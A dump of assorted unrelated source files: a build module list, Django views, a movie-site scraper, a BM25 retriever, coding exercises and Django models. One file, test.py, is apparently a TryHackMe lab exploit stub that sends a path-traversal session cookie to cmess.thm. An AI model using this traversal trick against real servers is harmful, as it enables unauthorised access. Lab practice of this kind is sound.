macro=\"RF_MODULE_INTRUSIVE_LIST\")\n)\n\nmodules.append(\n Module(\"HTABLE\",\n ['Data_Structures/htable.c'],\n macro=\"RF_MODULE_HTABLE\")\n)\n\nmodules.append(\n Module(\"MEMORY_POOL\",\n ['Utils/fixed_memory_pool.c'],\n macro=\"RF_MODULE_MEMORY_POOL\")\n)\n\nmodules.append(\n Module(\"BINARY_ARRAY\",\n ['Data_Structures/binaryarray.c'],\n macro=\"RF_MODULE_BINARYARRAY\")\n)\n\nmodules.append(\n Module(\"TIME\",\n win32_sources=['Time/time_win32.c'],\n linux_sources=['Time/time_linux.c'],\n macro=\"RF_MODULE_TIME_TIMER\")\n)\n\nmodules.append(\n Module(\"SYSTEM\",\n [],\n win32_sources=[\n 'System/rf_system_win32.c',\n 'System/rf_system_info_win32.c'\n ],\n linux_sources=[\n 'System/rf_system_linux.c',\n 'System/rf_system_info_linux.c'\n ],\n macro=\"RF_MODULE_SYSTEM\"))\n\n\nImport('local_env')\nenv = local_env\n\nif 'ALL' not in env['REFU_MODULES']:\n # add the core and system modules\n if 'CORE' not in env['REFU_MODULES']:\n env['REFU_MODULES'].append('CORE')\n if 'SYSTEM' not in env['REFU_MODULES']:\n env['REFU_MODULES'].append('SYSTEM')\n # make a copy of the dependencies\n deps = env['REFU_MODULES'][:]\n for mod in modules:\n if mod.name in env['REFU_MODULES']:\n mod.add(sources, env, deps)\nelse: # all modules requested\n for mod in modules:\n mod.add(sources, env, check=False)\n\nReturn('modules sources')\n","sub_path":"build_extra/clib/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"22889123","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom .models import Project\nfrom .forms import ProjectForm, ReviewForm\nfrom .utils import searchProjects, paginateProjects\n\n\ndef projects(request):\n projects, search = searchProjects(request)\n\n custom_range, projects = paginateProjects(request, projects, 3)\n \n context = {'projects': projects, 'search':search, 'custom_range':custom_range}\n return render(request, 'projects/projects.html', context)\n\n\ndef project(request, pk):\n project = Project.objects.get(id=pk)\n form = ReviewForm()\n\n if request.method == 'POST':\n form = ReviewForm(request.POST)\n review = form.save(commit=False)\n review.project = project\n review.owner = request.user.profile\n review.save()\n\n project.getVoteCount\n\n messages.success(request, 'Message sent successfully')\n\n return redirect('project', pk=project.id)\n\n return render(request, 'projects/project.html', {'project': project, 'form':form})\n\n\n@login_required(login_url=\"login\")\ndef createProject(request):\n page = 'create'\n profile = request.user.profile\n form = ProjectForm()\n\n if request.method == 'POST':\n form = ProjectForm(request.POST, request.FILES)\n if form.is_valid():\n # link project owner to profile !!!\n project = form.save(commit=False)\n project.owner = profile\n project.save()\n return redirect('projects')\n\n context = {'form': form, 'page':page}\n return render(request, 'projects/project_form.html', context)\n\n\n@login_required(login_url=\"login\")\ndef updateProject(request, pk):\n page = 'update'\n profile = request.user.profile\n project = profile.project_set.get(id=pk)\n form = ProjectForm(instance=project)\n\n if request.method == 'POST':\n form = ProjectForm(request.POST, request.FILES, instance=project)\n if form.is_valid():\n form.save()\n return redirect('projects')\n\n context = {'form': form, 'page':page}\n return render(request, 'projects/project_form.html', context)\n\n\n@login_required(login_url=\"login\")\ndef deleteProject(request, pk):\n profile = request.user.profile\n project = profile.project_set.get(id=pk)\n\n if request.method == 'POST':\n project.delete()\n return redirect('projects')\n\n context = {'object':project}\n return render(request, 'delete_template.html', context)\n\n","sub_path":"projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"421524946","text":"# -*- coding: UTF-8 -*-\nimport sys,re,os\nimport geturl as gethtml\nfrom geturl import PLchar as PLchar\n\nfrom cmf3 import parseDOM\nfrom cmf3 import replaceHTMLCodes\nfrom urllib.parse import parse_qs, quote, urlencode, quote_plus\nimport urllib.parse as urlparse\n\nfrom pprint import pprint\n\nUA = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0'\n\ndef ListContent(url,page):\n\t\n\tif '/page/' in url:\n\t\tnturl = re.sub('page\\/\\\\d+','page/%d'%(int(page)+1),url)\n\t\turl = re.sub('page\\/\\\\d+','page/%d'%int(page),url)\n\telse:\n\t\tnturl = url + 'page/%d' %(int(page)+1)\n\t\turl = url + 'page/%d' %int(page)\n\t\t\n\thtml,kuks = gethtml.getRequests(url)\n\tnpage=[]\n\tfout=[]\n\tsout=[]\n\t\n\ttry:\n\t\tpagination = parseDOM(html,'div', attrs={'class': \"pagination\"})[0]\n\t\tif pagination.find( '/page/%d' %(int(page)+1))>-1:\n\t\t\tnpage.append({'title':'Następna strona','url':nturl,'image':'','plot':'','page':int(page)+1})\n\texcept:\n\t\tpass\n\n\tresult = parseDOM(html,'div', attrs={'id': \"archive-content\"})\n\tresult =result[0] if result else html\n\tlinks = parseDOM(result,'article', attrs={'id': \"post\\-.+?\"})\n\t\n\tfor link in links:\n\t\thref = parseDOM(link, 'a', ret='href')[0]\n\t\timag = parseDOM(link, 'img', ret='src')[0]\n\t\ttry:\n\t\t\ttytul = (parseDOM(link, 'h4')[0]).strip(' ')\n\t\texcept:\n\t\t\ttytul = (parseDOM(link, 'h3')[0]).strip(' ')\n\t\t\n\t\tif '

    ' in tytul:\n\t\t\ttytul = (tytul.split('

    ')[0]).strip(' ')\n\t\topis = parseDOM(link,'div', attrs={'class': \"texto\"})\n\t\topis = opis[0] if opis else tytul\n\t\tgenre = re.findall('rel=\"tag\">([^>]+)<',link)\n\t\tkateg = ','.join([(x.strip()).lower() for x in genre]) if genre else ''\n\t\tmetad = parseDOM(link,'div', attrs={'class': \"metadata\"})\n\t\tjak = parseDOM(link,'span', attrs={'class': \"quality\"})\n\t\tjak = jak[0] if jak else ''\n\t\tif metad:\n\t\t\ttry:\n\t\t\t\tif'IMDb:' in metad[0]:\n\t\t\t\t\tif '/movies/' in \thref:\n\t\t\t\t\t\tif 'view' in metad[0]:\n\t\t\t\t\t\t\timdb,year,czas,wysw = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\timdb,year,czas = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tif 'view' in metad[0]:\n\t\t\t\t\t\t\timdb,year,wysw = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\timdb,year = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\telse:\n\t\t\t\t\tif '/movies/' in \thref:\n\t\t\t\t\t\tif 'view' in metad[0]:\n\t\t\t\t\t\t\tyear,czas,wysw = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tyear,czas = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tif 'view' in metad[0]:\n\t\t\t\t\t\t\tyear,wysw = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tyear = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\texcept:\n\t\t\t\timdb=''\n\t\t\t\tyear=''\n\t\t\t\tczas=''\n\t\t\t\twysw=''\n\t\telse:\n\t\t\tyear=''\n\t\t\ttry:\n\t\t\t\tyear = re.findall('(.+?)<\\/span><\\/div>',link)[0]\n\t\t\texcept:\n\t\t\t\tyear = '' \n\t\t\timdb=''\n\t\t\tczas=''\n\t\t\twysw=''\n\t\tif '/movies/' in \thref:\n\t\t\tfout.append({'title':PLchar(tytul),'url':PLchar(href),'image':PLchar(imag),'plot':PLchar(opis),'year':year,'code':PLchar(jak),'genre':PLchar(kateg)})\t\n\t\telse:\n\t\t\tsout.append({'title':PLchar(tytul),'url':PLchar(href),'image':PLchar(imag),'plot':PLchar(opis),'year':year,'code':PLchar(jak),'genre':PLchar(kateg)})\n\n\treturn fout,sout,npage\n\ndef getVideo(url):\n\tout=[]\n\thtml,kuks = gethtml.getRequests(url)\n\tstream_url=''\n\t\n\tresult = parseDOM(html,'div', attrs={'id': \"playeroptions\"})\n\tif result:\n\t\tresult=result[0]\n\t\tvideos = re.findall(\"
  • ([^<]+)<',vid)[0]\n\t\t\tdata = 'action=doo_player_ajax&post=%s&nume=%s&type=%s'%(dpost,dnume,dtype)\n\t\t\tout.append({'href':data,'host':host})\n\t\n\t\tif out:\n\t\t\tif len(out) > 100:\n\t\t\t\tu = [ x.get('href') for x in out]\n\t\t\t\th = [ x.get('host') for x in out]\n\t\t\t\tsel = gethtml.selectDialog(\"Źródło\", h)\n\t\t\t\tdata = out[sel].get('href') if sel>-1 else ''\n\t\t\telse:\n\t\t\t\tdata = out[0].get('href')\n\t\t\tif data:\n\t\t\t\theaders = {\n\t\t\t\t\t'User-Agent': UA,\n\t\t\t\t\t'Accept': '*/*',\n\t\t\t\t\t'Accept-Language': 'pl,en-US;q=0.7,en;q=0.3',\n\t\t\t\t\t'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n\t\t\t\t\t'X-Requested-With': 'XMLHttpRequest',\n\t\t\t\t\t'Origin': 'https://watch-movies.pl',\n\t\t\t\t\t'Connection': 'keep-alive',\n\t\t\t\t\t'Referer': url,\n\t\t\t\t\t'TE': 'Trailers',}\n\n\t\t\t\tposturl = 'https://watch-movies.pl/wp-admin/admin-ajax.php'\n\t\t\t\thtml,kuks = gethtml.getRequests(posturl,data=data,headers=headers)\n\t\t\t\tstream_url = parseDOM(html, 'iframe', ret='src')#[0] \n\t\t\t\tstream_url = stream_url[0] if stream_url else ''\n\t\t\telse:\n\t\t\t\treturn stream_url,'quit'\n\treturn stream_url,True\n\n\n# a, b, c = ListContent('https://watch-movies.pl/release/2020/page/1', 1)\n\n# vid, x = getVideo('https://watch-movies.pl/movies/upadek-grace/')\n# pprint(vid)\n","sub_path":"watchmovies2.py","file_name":"watchmovies2.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"320360293","text":"#!/usr/bin/env python\n# encoding:utf-8\n# -----------------------------------------#\n# Filename: bm25.py.py\n#\n# Description: bm25相似度检索\n# Version: 1.0\n# Created: 2020/6/18 14:06\n# Author: chenxiang@myhexin.com\n# Company: www.iwencai.com\n#\n# -----------------------------------------#\n\nimport glob\nimport json\nimport time\n\nimport dill\n\nimport jieba\nimport re\nimport heapq\nimport os\nfrom gensim.summarization import bm25\n\n\nclass BM25Retrieval(object):\n def __init__(self, corpus_file_pattern=None, stop_words_file=\"stop_words.txt\", MAX_LEN=300, path=\"./\"):\n \"\"\"\n BM25检索模块,主要是在BM25库基础上封装了预处理部分。\n :param corpus_file_pattern: 检索资料库-文本数据 str\n :param stop_words_file: 停用词表 str\n :param path: 保存的模型目录 str\n \"\"\"\n os.makedirs(path, exist_ok=True)\n self.model = os.path.join(path, \"bm25.m\")\n self.sen = os.path.join(path, \"sen.pkl\")\n self.stop = os.path.join(path, \"stop.pkl\")\n self.MAX_LEN = MAX_LEN\n if os.path.isfile(self.model) and os.path.isfile(self.sen) and os.path.isfile(self.stop):\n self.load()\n else:\n assert corpus_file_pattern is not None, \"Can not find model or corpus file.\"\n if os.path.isfile(stop_words_file):\n self.stop_words = self.load_stop_words(stop_words_file)\n self.sentences, corpus = self.get_corpus(corpus_file_pattern)\n self.bm25 = bm25.BM25(corpus)\n self.dump()\n\n @staticmethod\n def load_stop_words(f=\"stop_words.txt\"):\n words = set()\n with open(f, \"r\", encoding=\"utf-8\") as fp:\n for line in fp:\n words.add(line.strip())\n return words\n\n def cut_and_stop(self, s):\n ws = jieba.cut(s) # 分词\n ws = [x for x in ws if x not in self.stop_words] # 去除停用词\n return ws\n\n @staticmethod\n def strQ2B(ustring):\n rstring = \"\"\n for uchar in ustring:\n inside_code = ord(uchar)\n # 全角区间\n if inside_code >= 0xFF01 and inside_code <= 0xFF5E:\n inside_code -= 0xfee0\n rstring += chr(inside_code)\n # 全角空格特殊处理\n elif inside_code == 0x3000 or inside_code == 0x00A0:\n inside_code = 0x0020\n rstring += chr(inside_code)\n else:\n rstring += uchar\n return rstring\n\n def get_corpus(self, input_file_pattern):\n \"\"\"\n 句号+换行符作为段落分隔标识,连续段落不超最大长度可合并;段落超长按句号分隔。\n :param input_file_pattern:\n :return:\n \"\"\"\n sentences = []\n corpus = []\n sen_tmp = \"\"\n for f in glob.iglob(str(input_file_pattern)):\n print(f)\n with open(f, \"r\", encoding=\"utf-8\") as fp:\n lines = []\n for line in fp:\n line = self.strQ2B(re.sub(r\"\\s+\", \"\", line)) # 全角转半角\n if len(line) < 2: continue\n lines.append(line)\n lines_str = \"\\n\".join(lines)\n paragraphs = lines_str.split(\"。\\n\")\n for para in paragraphs:\n if len(sen_tmp) + len(para) <= self.MAX_LEN:\n sen_tmp += para + \"。\\n\"\n else:\n words = self.cut_and_stop(sen_tmp)\n corpus.append(words)\n sentences.append(sen_tmp)\n if len(para) <= self.MAX_LEN:\n sen_tmp = para + \"。\\n\"\n else:\n sen_tmp = \"\"\n para_sep = para.split(\"。\")\n for p in para_sep:\n if len(sen_tmp) + len(p) <= self.MAX_LEN:\n sen_tmp += p + \"。\"\n else:\n words = self.cut_and_stop(sen_tmp)\n corpus.append(words)\n sentences.append(sen_tmp)\n sen_tmp = p + \"。\"\n sen_tmp += \"\\n\"\n if sen_tmp:\n words = self.cut_and_stop(sen_tmp)\n corpus.append(words)\n sentences.append(sen_tmp)\n sen_tmp = \"\"\n assert len(sentences) == len(corpus)\n print(\"Total paragraphs: \", len(sentences))\n return sentences, corpus\n\n def get_scores(self, document):\n \"\"\"\n 输入一个句子,返回库中所有候选的相似度\n :param document: str\n :return: List[float]\n \"\"\"\n line = self.strQ2B(re.sub(r\"\\s+\", \"\", document)) # 全角转半角\n tokens = self.cut_and_stop(line)\n return self.bm25.get_scores(tokens)\n\n def top_k(self, document, k=1):\n \"\"\"\n 输入document,返回最相似的k个句子。\n :param document: str\n :param k:\n :return: List[str]\n \"\"\"\n scores = self.get_scores(document)\n indexes = heapq.nlargest(k, range(len(scores)), scores.__getitem__)\n return [self.sentences[i] for i in indexes]\n\n def dump(self):\n with open(self.model, 'wb') as fpm, open(self.sen, 'wb') as fpse, open(self.stop, 'wb') as fpst:\n dill.dump(self.bm25, fpm)\n dill.dump(self.sentences, fpse)\n dill.dump(self.stop_words, fpst)\n\n def load(self):\n with open(self.model, 'rb') as fpm, open(self.sen, 'rb') as fpse, open(self.stop, 'rb') as fpst:\n self.bm25 = dill.load(fpm)\n self.sentences = dill.load(fpse)\n self.stop_words = dill.load(fpst)\n\n\nTAGS = \"ABCDⅠⅡⅢⅣⅤⅥⅦⅧⅨ①②③④⑤⑥⑦⑧.、0123456789 \"\n\n\ndef test(mode=\"1\", top_k=3): # mode=0: query only; mode=1: query+option\n datasets = \"../data/train.json\"\n corpus_files = \"../data/books/*.txt\"\n bm25_retrieval = BM25Retrieval(corpus_files, path=\"./models/\")\n time_start = time.time()\n num = 0\n for f in glob.glob(str(datasets)):\n dataset_new = []\n with open(f, \"r\", encoding=\"utf-8\") as fp, \\\n open(f + \".mode\" + mode + \".top\" + str(top_k) + \".out\", \"w\", encoding=\"utf-8\") as fp1:\n for line in fp:\n data = json.loads(line)\n query = data[\"question\"]\n options = data[\"options\"]\n evidences = {}\n if mode == \"0\":\n evidence = bm25_retrieval.top_k(query.strip(TAGS), top_k)\n for k in options.keys():\n evidences[k] = evidence\n elif mode == \"1\":\n for k, v in options.items():\n evidence = bm25_retrieval.top_k(query.strip(TAGS) + \"\\n\" + v.strip(TAGS), top_k)\n evidences[k] = evidence\n data[\"evidences\"] = evidences\n dataset_new.append(data)\n for d in dataset_new:\n fp1.write(json.dumps(d, ensure_ascii=False) + \"\\n\")\n num += 1\n time_end = time.time()\n print(\"Total examples: \", num)\n print(\"Sec/example: \", (time_end - time_start) / num)\n\n\nif __name__ == \"__main__\":\n test(mode=\"1\", top_k=3)\n","sub_path":"retrieval/bm25.py","file_name":"bm25.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"194788105","text":"import sys\nsys.stdin = open(\"input_4837.txt\", \"r\")\nsys.stdout = open(\"output_4837.txt\", \"w\")\n\nT = int(input())\nfor t in range(1, T+1):\n arr = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n lst = list(map(int, input().split()))\n N = lst[0]\n K = lst[1]\n result = 0 \n for i in range(1 << len(arr)) :\n part_set=[]\n \n for j in range(len(arr)): \n if i & (1 << j) !=0:\n part_set += [arr[j]]\n\n \n if len(part_set) == N:\n sum_set = 0 \n for x in part_set:\n sum_set += x\n if sum_set == K:\n result +=1\n else:\n result == 0\n\n print('#'+str(t)+' '+ str(result))\n","sub_path":"SWEA/4837_부분집합의합.py","file_name":"4837_부분집합의합.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"107689273","text":"import requests\nimport time\n\ntarget_url = \"http://cmess.thm\"\ncmd = \"ping 10.6.32.20\"\n\nurl = target_url+\"?c=admin\"\ncookies = {\"GSESSIONID\": \"../../index.php\"}\nheaders = {\"User-Agent\": \"\"}\nrequests.get(url, headers=headers, cookies=cookies)\ntime.sleep(5)\nrequests.get(target_url+\"/index.php\")","sub_path":"tryhackme/cmess/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"277670078","text":"#!/bin/python3\n\nimport sys\n\nfrom datetime import timedelta\nfrom datetime import date\n\ndef solve(year):\n if year >= 1919:\n d1 = date(day=1,month=1,year=year)\n d2 = timedelta(days=255)\n resp = d1 + d2\n return str(resp.day).zfill(2) + \".\" + str(resp.month).zfill(2) + \".\" + str(resp.year)\n elif year < 1918:\n if year%4!=0:\n #not leap year\n return \"13.09.\" + str(year)\n else:\n return \"12.09.\" + str(year)\n else:\n d1 = date(day=1,month=1,year=year)\n d2 = timedelta(days = 268)\n resp = d1+d2\n return str(resp.day).zfill(2) + \".\" + str(resp.month).zfill(2) + \".\" + str(resp.year)\n\n\n\n\n\n\n\nyear = int(input().strip())\nresult = solve(year)\nprint(result)\n","sub_path":"dayProgrammer.py","file_name":"dayProgrammer.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"98389946","text":"from django.db import models\nfrom django.conf import settings\n\nfrom model_utils import Choices\nfrom model_utils.fields import AutoCreatedField\nfrom model_utils.models import TimeStampedModel, StatusModel\n\nfrom .signals import user_linked_to_response\nfrom .utils import generate_code, filter_responses\n\n\nclass Referral(models.Model):\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL, related_name=\"referral_codes\", null=True\n )\n label = models.CharField(max_length=100, blank=True)\n code = models.CharField(max_length=40, unique=True)\n expired_at = models.DateTimeField(null=True)\n created_at = AutoCreatedField()\n\n def __unicode__(self):\n if self.user:\n return \"%s (%s)\" % (self.user, self.code)\n else:\n return self.code\n\n @classmethod\n def for_request(cls, request):\n cookie = request.COOKIES.get(\"referral\")\n if cookie:\n code, session_key = cookie.split(\":\")\n\n try:\n return Referral.objects.get(code=code)\n except Referral.DoesNotExist:\n pass\n\n @property\n def response_count(self):\n return self.responses.filter(action=\"RESPONDED\").count()\n\n @classmethod\n def create(cls, user=None, label=\"\"):\n code = generate_code(cls)\n\n obj, _ = cls.objects.get_or_create(user=user, code=code, label=label)\n\n return obj\n\n @classmethod\n def record_response(cls, request, action_string):\n referral = cls.referral_for_request(request)\n\n if referral:\n return referral.respond(request, action_string)\n\n @classmethod\n def referral_for_request(cls, request):\n if request.user.is_authenticated():\n qs = ReferralResponse.objects.filter(user=request.user)\n else:\n qs = ReferralResponse.objects.filter(session_key=request.session.session_key)\n\n try:\n return qs.order_by(\"-created_at\")[0].referral\n except IndexError:\n pass\n\n def link_responses_to_user(self, user, session_key):\n responses = self.responses.filter(session_key=session_key, user__isnull=True)\n\n for response in responses:\n response.user = user\n response.save(update_fields=['user'])\n\n user_linked_to_response.send(sender=self, response=response)\n\n def respond(self, request, action_string, user=None):\n if user is None:\n if request.user.is_authenticated():\n user = request.user\n else:\n user = None\n\n ip_address = request.META.get(settings.IP_ADDRESS_META_FIELD, \"\")\n\n kwargs = dict(\n referral=self,\n session_key=request.session.session_key,\n ip_address=ip_address,\n action=action_string,\n user=user\n )\n\n return ReferralResponse.objects.create(**kwargs)\n\n def filtered_responses(self):\n return filter_responses(referral=self)\n\n\nclass ReferralResponse(models.Model):\n referral = models.ForeignKey(Referral, related_name=\"responses\")\n session_key = models.CharField(max_length=40)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True)\n ip_address = models.CharField(max_length=45)\n action = models.CharField(max_length=128)\n created_at = AutoCreatedField()\n\n\nclass ReferralsReward(TimeStampedModel, StatusModel):\n STATUS = Choices('pending', 'redeemed')\n\n user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='rewards')\n response = models.ForeignKey(ReferralResponse, blank=True, null=True)\n\n class Meta:\n verbose_name = \"Referrals Reward\"\n verbose_name_plural = \"Referrals Rewards\"\n\n def __unicode__(self):\n return self.user\n\n def get_redeem(self):\n self.status = self.STATUS.redeemed\n self.save()\n","sub_path":"bidi/referrals/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"38402956","text":"#回溯法\nfrom typing import List\nclass Solution:\n def makesquare(self, matchsticks: List[int]) -> bool:\n ssum = sum(matchsticks)\n if ssum%4 !=0:\n return False\n matchsticks.sort(reverse=True)\n num = ssum//4\n\n edges = [0]*4\n def dfs(idx:int)->bool:\n if idx == len(matchsticks):\n return True\n for i in range(4):\n edges[i] +=matchsticks[idx]\n if edges[i] <= num and dfs(idx+1):\n return True\n edges[i] -= matchsticks[idx]\n return False\n return dfs(0)\n\n\nx = Solution()\nx.makesquare([5,5,5,5,4,4,4,4,3,3,3,3])\n\n \n","sub_path":"473. 火柴拼正方形/473. 火柴拼正方形.py","file_name":"473. 火柴拼正方形.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"267096053","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.by import By\n\nclass SearchTests(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(30)\n self.driver.maximize_window()\n self.driver.get('http://demo-store.seleniumacademy.com')\n \n def test_count_of_promo_banners_images(self):\n #banner_list = self.driver.find_element_by_class_name(\"promos\")\n #banners = banner_list.find_elements_by_tag_name(\"img\")\n banners = self.driver.find_elements_by_tag_name(\"img\")\n self.assertEqual(3, len(banners))\n\n def tearDown(self):\n self.driver.quit()\n \nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"selenium1/findelement_tag.py","file_name":"findelement_tag.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"651230834","text":"from django.shortcuts import render\nfrom django.views import View\nfrom PyDictionary import PyDictionary\n\n# Create your views here.\n\nclass SearchView(View):\n def get(self, request):\n return render(request, \"dict/search.html\")\n\nclass ResultView(View):\n def post(self, request):\n word = request.POST[\"value\"]\n object = PyDictionary()\n meaning = object.meaning(word)\n syn = object.synonym(word)\n ant = object.antonym(word)\n\n # var = Dict(word=word, time=datetime.now())\n # var.save()\n\n return render(request, \"dict/result.html\", {'Word':word, 'Meaning':meaning, 'Synonym':syn, 'Antonym': ant})","sub_path":"enprac/dictionary/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"233358612","text":"class Solution(object):\n\n def findPeak(self, nums, l, r):\n if r - l <= 2:\n return None\n\n mid = (r + l) // 2\n ll = nums[mid - 1]\n rr = nums[mid + 1]\n m = nums[mid]\n\n if ll < m and m > rr:\n return mid\n\n res = None\n if ll > m:\n res = self.findPeak(nums, l, mid + 1)\n\n if res:\n return res\n\n if rr > m:\n res = self.findPeak(nums, mid, r)\n\n if res:\n return res\n\n return None\n\n def findPeakElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) == 1:\n return 0\n\n if nums[0] > nums[1]:\n return 0\n if nums[-1] > nums[-2]:\n return len(nums) - 1\n\n ret = self.findPeak(nums, 0, len(nums))\n\n return ret\n\n\nif __name__ == \"__main__\":\n s = Solution()\n\n nums = [1, 2, 3, 1]\n\n # nums = [-26, 2, 9, 30, 25, 10, -60, 95, -91, 91, -43, 46, -17, 27, 21, -39, 66, 74, -21, -86, 39, -66, -64, -49, 40,\n # 34, 69, -97, -24, 42, 18, -15, 80, 76, -78, 92, -44, 83, 88, 67, -70, 73, -79, 90, 41, -77, -61, 28, 19, 45]\n\n # nums = [1, 2, 1, 3, 5, 6, 4]\n nums = [3, 2, 1]\n print(s.findPeakElement(nums))\n","sub_path":"p162.py","file_name":"p162.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"327447128","text":"class Solution:\n def findOcurrences(self, text: str, first: str, second: str) -> List[str]:\n # Time: O(n); n being the length of text\n # Space: O(1)\n \n # Split text into words\n words = text.split()\n print(words)\n \n # Use two pointers and keep track of the range first-second-third\n res = []\n for i in range(2, len(words)):\n if words[i-2] == first and words[i-1] == second:\n res.append(words[i])\n \n return res","sub_path":"leetcode/lc1078_Occurrences_After_Bigram.py","file_name":"lc1078_Occurrences_After_Bigram.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"526709533","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nfrom apps.bcpp.choices import (YES_NO_DWTA, YES_NO_UNSURE, YES_NO_UNSURE_DWTA, SEXDAYS_CHOICE, LASTSEX_CHOICE, FIRSTRELATIONSHIP_CHOICE,\n FIRSTPARTNERHIV_CHOICE, FIRSTDISCLOSE_CHOICE, FIRSTCONDOMFREQ_CHOICE, AGE_RANGES)\nfrom apps.bcpp_list.models import PartnerResidency\n\nfrom .base_scheduled_visit_model import BaseScheduledVisitModel\n\n\nclass BaseSexualPartner (BaseScheduledVisitModel):\n\n first_partner_live = models.ManyToManyField(\n PartnerResidency,\n verbose_name=_(\"Over the past 12 months, where has this sexual partner\"\n \" lived to the best of your knowledge?\"),\n help_text=\"\")\n\n third_last_sex = models.CharField(\n verbose_name=_(\"When was the last [most recent] time you had sex with\"\n \" this person (how long ago)?\"),\n max_length=25,\n choices=SEXDAYS_CHOICE,\n help_text=\"\")\n\n third_last_sex_calc = models.IntegerField(\n verbose_name=_(\"Give the number of days/months since last had sex with this person.\"),\n max_length=2,\n null=True,\n blank=True,\n help_text=\"e.g. if last sex was last night, then it should be recorded as 1 day\")\n\n first_first_sex = models.CharField(\n verbose_name=_(\"When was the first time you had sex with this person [how long ago]?\"),\n max_length=25,\n choices=LASTSEX_CHOICE,\n help_text=\"\")\n\n first_first_sex_calc = models.IntegerField(\n verbose_name=_(\"Give the number of days/months/years since first had sex with this person.\"),\n max_length=2,\n null=True,\n blank=True,\n help_text=\"e.g. if first sex was last night, then it should be recorded as 1 day\")\n\n first_sex_current = models.CharField(\n verbose_name=_(\"Do you expect to have sex with this person again?\"),\n max_length=25,\n choices=YES_NO_DWTA,\n help_text=\"\")\n\n first_relationship = models.CharField(\n verbose_name=_(\"What type of relationship do you have with this person?\"),\n max_length=40,\n choices=FIRSTRELATIONSHIP_CHOICE,\n help_text=\"\")\n\n first_exchange = models.CharField(\n verbose_name=_(\"To the best of your knowledge, how old is this person?\"),\n max_length=40,\n choices=AGE_RANGES,\n help_text=(\"Note: If participant does not want to answer, leave blank.\"))\n\n concurrent = models.CharField(\n verbose_name=_(\"Over the past 12 months, during the time you were having a sexual relationship\"\n \" with this person, did YOU have sex with other people (including husband/wife)?\"),\n max_length=25,\n choices=YES_NO_DWTA,\n help_text=\"\")\n\n goods_exchange = models.CharField(\n verbose_name=_(\"Have you received money, transport, food/drink, or other goods in exchange for\"\n \" sex from this partner?\"),\n max_length=25,\n choices=YES_NO_DWTA,\n help_text=\"\")\n\n first_sex_freq = models.IntegerField(\n verbose_name=_(\"During the last 3 months [of your relationship, if it has ended] how many \"\n \"times did you have sex with this partner?\"),\n max_length=2,\n null=True,\n blank=True,\n help_text=\"\")\n\n first_partner_hiv = models.CharField(\n verbose_name=_(\"What is this partner's HIV status?\"),\n max_length=25,\n choices=FIRSTPARTNERHIV_CHOICE,\n null=True,\n help_text=\"\")\n\n partner_hiv_test = models.CharField(\n verbose_name=_(\"Has your partner been tested for HIV in last 12 months\"),\n choices=YES_NO_UNSURE_DWTA,\n max_length=25,\n help_text=\"\")\n\n first_haart = models.CharField(\n verbose_name=_(\"Is this partner taking antiretroviral treatment?\"),\n max_length=25,\n choices=YES_NO_UNSURE,\n null=True,\n blank=True,\n help_text=\"supplemental\")\n\n first_disclose = models.CharField(\n 